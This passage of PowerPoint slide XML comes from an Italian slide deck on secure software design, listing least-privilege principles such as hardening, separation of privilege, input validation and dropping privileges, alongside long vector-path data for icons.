            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" err="1"/>
              <a:t>Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>eseguire codice usando privilegi quanto più bassi possibili.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" b="1" err="1"/>
              <a:t>Separation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" err="1"/>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>identificare le funzionalità che richiedono privilegi aggiuntivi, in maniera tale da isolare il codice privilegiato da altro codice.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;4976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFED1EC-E8DD-6AEF-DB4E-79E37B55359A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4666620" y="3096491"/>
            <a:ext cx="3752179" cy="184427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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>Implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Convalida input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>per qualsiasi codice privilegiato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Assicurarsi il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>corretto abbassamento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>dei privilegi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Determinare il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>livello di accesso minimo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>se bisogna eseguire del codice con privilegi extra</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Google Shape;6337;p113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7925739-C3C7-766F-DE92-E2DB0ADEDC98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7854071" y="3096491"/>
            <a:ext cx="470108" cy="416719"/>
            <a:chOff x="1498733" y="2704451"/>
            <a:chExt cx="470108" cy="416719"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Google Shape;6338;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6647643-6B1D-6CB5-BA08-1BA2C86AD872}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1510588" y="2715844"/>
              <a:ext cx="451793" cy="303892"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="20943" h="14087" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1782" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19161" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20135" y="1"/>
                    <a:pt x="20943" y="808"/>
                    <a:pt x="20943" y="1803"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20943" y="12305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20943" y="13299"/>
                    <a:pt x="20135" y="14086"/>
                    <a:pt x="19161" y="14086"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1782" y="14086"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="14086"/>
                    <a:pt x="1" y="13299"/>
                    <a:pt x="1" y="12305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="1782"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="808"/>
                    <a:pt x="788" y="1"/>
                    <a:pt x="1782" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1782" y="1"/>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339;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B478EB7B-0DE6-A19C-B1F1-1373A4C67120}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1510588" y="2962504"/>
              <a:ext cx="451793" cy="57232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="20943" h="2653" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="20943" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="871"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1865"/>
                    <a:pt x="788" y="2652"/>
                    <a:pt x="1782" y="2652"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19161" y="2652"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20135" y="2652"/>
                    <a:pt x="20943" y="1865"/>
                    <a:pt x="20943" y="871"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="20943" y="1"/>
                  </a:move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340;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A34F8559-21A2-ABF6-D768-93F9E3FF3075}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1654023" y="3019715"/>
              <a:ext cx="164922" cy="88943"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7645" h="4123" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="6174" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1472" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1472" y="2154"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1451" y="3066"/>
                    <a:pt x="871" y="3853"/>
                    <a:pt x="1" y="4122"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7644" y="4122"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6774" y="3853"/>
                    <a:pt x="6174" y="3066"/>
                    <a:pt x="6174" y="2154"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6174" y="0"/>
                  </a:move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341;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA68DC76-04CD-03A9-CC82-448C4BF14342}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1645998" y="2748462"/>
              <a:ext cx="180540" cy="180993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8369" h="8390" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="6131" y="1099"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6566" y="643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7726" y="1803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7271" y="2259"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7478" y="2590"/>
                    <a:pt x="7644" y="2963"/>
                    <a:pt x="7726" y="3356"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8369" y="3356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8369" y="4993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7747" y="4993"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7644" y="5407"/>
                    <a:pt x="7499" y="5780"/>
                    <a:pt x="7271" y="6132"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7726" y="6588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6566" y="7727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6111" y="7292"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5779" y="7499"/>
                    <a:pt x="5386" y="7665"/>
                    <a:pt x="4992" y="7748"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4992" y="8390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3376" y="8390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3376" y="7727"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2983" y="7644"/>
                    <a:pt x="2589" y="7499"/>
                    <a:pt x="2258" y="7271"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1802" y="7727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642" y="6567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098" y="6132"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870" y="5780"/>
                    <a:pt x="725" y="5407"/>
                    <a:pt x="642" y="5014"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642" y="3377"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="725" y="2984"/>
                    <a:pt x="870" y="2590"/>
                    <a:pt x="1098" y="2259"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="642" y="1803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1802" y="643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258" y="1099"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2589" y="871"/>
                    <a:pt x="2983" y="726"/>
                    <a:pt x="3376" y="622"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3376" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5013" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5013" y="622"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5406" y="726"/>
                    <a:pt x="5779" y="871"/>
                    <a:pt x="6131" y="1099"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4184" y="2735"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2900" y="2735"/>
                    <a:pt x="2258" y="4289"/>
                    <a:pt x="3169" y="5200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4081" y="6111"/>
                    <a:pt x="5634" y="5469"/>
                    <a:pt x="5634" y="4185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5634" y="3377"/>
                    <a:pt x="4992" y="2735"/>
                    <a:pt x="4184" y="2735"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4184" y="2735"/>
                  </a:move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342;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B43E2769-32AC-2A80-77ED-A7FD1DA9F114}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1498733" y="2704451"/>
              <a:ext cx="470108" cy="411129"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="21792" h="19058" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="19596" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2217" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="995" y="0"/>
                    <a:pt x="1" y="974"/>
                    <a:pt x="1" y="2196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="12719"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="13941"/>
                    <a:pt x="995" y="14935"/>
                    <a:pt x="2217" y="14935"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8121" y="14935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8121" y="16675"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8100" y="17359"/>
                    <a:pt x="7665" y="17980"/>
                    <a:pt x="7002" y="18208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6091" y="18208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5573" y="18249"/>
                    <a:pt x="5573" y="19016"/>
                    <a:pt x="6091" y="19057"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9218" y="19057"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9736" y="19016"/>
                    <a:pt x="9736" y="18249"/>
                    <a:pt x="9218" y="18208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8431" y="18208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8783" y="17773"/>
                    <a:pt x="8970" y="17234"/>
                    <a:pt x="8970" y="16675"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8970" y="14935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12864" y="14935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12864" y="16675"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12864" y="17234"/>
                    <a:pt x="13051" y="17773"/>
                    <a:pt x="13403" y="18208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12636" y="18208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12098" y="18249"/>
                    <a:pt x="12098" y="19016"/>
                    <a:pt x="12636" y="19057"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="15743" y="19057"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16261" y="19016"/>
                    <a:pt x="16261" y="18249"/>
                    <a:pt x="15743" y="18208"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14791" y="18208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14128" y="17980"/>
                    <a:pt x="13693" y="17359"/>
                    <a:pt x="13693" y="16675"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13693" y="14935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19596" y="14935"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20798" y="14935"/>
                    <a:pt x="21792" y="13941"/>
                    <a:pt x="21792" y="12719"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21792" y="2196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21792" y="974"/>
                    <a:pt x="20818" y="0"/>
                    <a:pt x="19596" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2217" y="850"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="19596" y="850"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20342" y="850"/>
                    <a:pt x="20943" y="1450"/>
                    <a:pt x="20943" y="2196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20943" y="11434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850" y="11434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850" y="2196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="850" y="1450"/>
                    <a:pt x="1471" y="850"/>
                    <a:pt x="2217" y="850"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="19596" y="14065"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2217" y="14065"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1471" y="14065"/>
                    <a:pt x="850" y="13464"/>
                    <a:pt x="850" y="12719"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="850" y="12284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20943" y="12284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20943" y="12719"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20943" y="13464"/>
                    <a:pt x="20342" y="14086"/>
                    <a:pt x="19596" y="14086"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="19596" y="14065"/>
                  </a:move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343;p113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E919EC5-8BA7-4EAF-BD00-F646E7BA9EB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1640028" y="2737131"/>
              <a:ext cx="198877" cy="199330"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9219" h="9240" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="415" y="5863"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="726" y="5863"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="788" y="6070"/>
                    <a:pt x="871" y="6277"/>
                    <a:pt x="974" y="6484"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="767" y="6691"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="6857"/>
                    <a:pt x="601" y="7126"/>
                    <a:pt x="767" y="7292"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1927" y="8452"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="8618"/>
                    <a:pt x="2362" y="8618"/>
                    <a:pt x="2528" y="8452"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2735" y="8245"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2942" y="8349"/>
                    <a:pt x="3149" y="8431"/>
                    <a:pt x="3356" y="8494"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3356" y="8804"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3356" y="9032"/>
                    <a:pt x="3543" y="9239"/>
                    <a:pt x="3791" y="9239"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5428" y="9239"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5656" y="9239"/>
                    <a:pt x="5842" y="9032"/>
                    <a:pt x="5842" y="8804"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5842" y="8494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6070" y="8431"/>
                    <a:pt x="6277" y="8349"/>
                    <a:pt x="6464" y="8245"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6691" y="8452"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6857" y="8618"/>
                    <a:pt x="7126" y="8618"/>
                    <a:pt x="7292" y="8452"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8452" y="7292"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8618" y="7126"/>
                    <a:pt x="8618" y="6857"/>
                    <a:pt x="8452" y="6691"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8224" y="6484"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8328" y="6277"/>
                    <a:pt x="8411" y="6070"/>
                    <a:pt x="8494" y="5863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8804" y="5863"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9032" y="5863"/>
                    <a:pt x="9219" y="5676"/>
                    <a:pt x="9219" y="5428"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9219" y="3791"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9219" y="3564"/>
                    <a:pt x="9032" y="3377"/>
                    <a:pt x="8804" y="3377"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8494" y="3377"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8411" y="3170"/>
                    <a:pt x="8328" y="2963"/>
                    <a:pt x="8224" y="2756"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8431" y="2549"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8597" y="2362"/>
                    <a:pt x="8597" y="2093"/>
                    <a:pt x="8431" y="1927"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7292" y="788"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7106" y="601"/>
                    <a:pt x="6857" y="601"/>
                    <a:pt x="6691" y="788"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6464" y="995"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6256" y="891"/>
                    <a:pt x="6049" y="809"/>
                    <a:pt x="5842" y="746"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5842" y="436"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5842" y="187"/>
                    <a:pt x="5656" y="1"/>
                    <a:pt x="5407" y="1"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3791" y="1"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3543" y="1"/>
                    <a:pt x="3356" y="187"/>
                    <a:pt x="3356" y="436"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3356" y="746"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3149" y="809"/>
                    <a:pt x="2942" y="891"/>
                    <a:pt x="2735" y="995"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2528" y="788"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2362" y="601"/>
                    <a:pt x="2093" y="601"/>
                    <a:pt x="1927" y="788"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="767" y="1927"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="2093"/>
                    <a:pt x="601" y="2362"/>
                    <a:pt x="767" y="2549"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="974" y="2756"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="871" y="2963"/>
                    <a:pt x="788" y="3170"/>
                    <a:pt x="726" y="3377"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="415" y="3377"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="3377"/>
                    <a:pt x="1" y="3564"/>
                    <a:pt x="1" y="3791"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="5428"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5676"/>
                    <a:pt x="187" y="5863"/>
                    <a:pt x="415" y="5863"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="850" y="4247"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1057" y="4247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1244" y="4247"/>
                    <a:pt x="1430" y="4102"/>
                    <a:pt x="1471" y="3895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1554" y="3543"/>
                    <a:pt x="1699" y="3211"/>
                    <a:pt x="1886" y="2901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="2735"/>
                    <a:pt x="1948" y="2528"/>
                    <a:pt x="1824" y="2383"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1679" y="2238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2238" y="1699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="1844"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2507" y="1969"/>
                    <a:pt x="2735" y="1989"/>
                    <a:pt x="2901" y="1906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3191" y="1699"/>
                    <a:pt x="3522" y="1575"/>
                    <a:pt x="3874" y="1492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4081" y="1451"/>
                    <a:pt x="4206" y="1264"/>
                    <a:pt x="4206" y="1078"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4206" y="871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4993" y="871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4993" y="1078"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4993" y="1264"/>
                    <a:pt x="5117" y="1451"/>
                    <a:pt x="5324" y="1492"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5676" y="1575"/>
                    <a:pt x="6008" y="1699"/>
                    <a:pt x="6298" y="1906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6464" y="2010"/>
                    <a:pt x="6691" y="1969"/>
                    <a:pt x="6816" y="1844"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6961" y="1699"/>
                  </a:lnTo>
                  <a:lnTo>
